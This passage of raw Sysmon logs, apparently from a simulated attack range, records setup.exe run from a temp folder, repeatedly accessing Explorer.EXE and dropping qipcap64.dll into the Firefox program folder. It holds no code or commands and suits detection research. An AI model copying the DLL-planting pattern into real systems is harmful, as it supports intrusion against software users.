1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015376Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015375Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015374Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015373Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015372Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015371Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015370Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000015369Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\qipcap64.dll2021-01-18 13:59:52.536 10341000x800000000000000015368Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015367Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015366Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015365Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015364Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015363Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015362Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015361Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015360Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015359Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015358Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 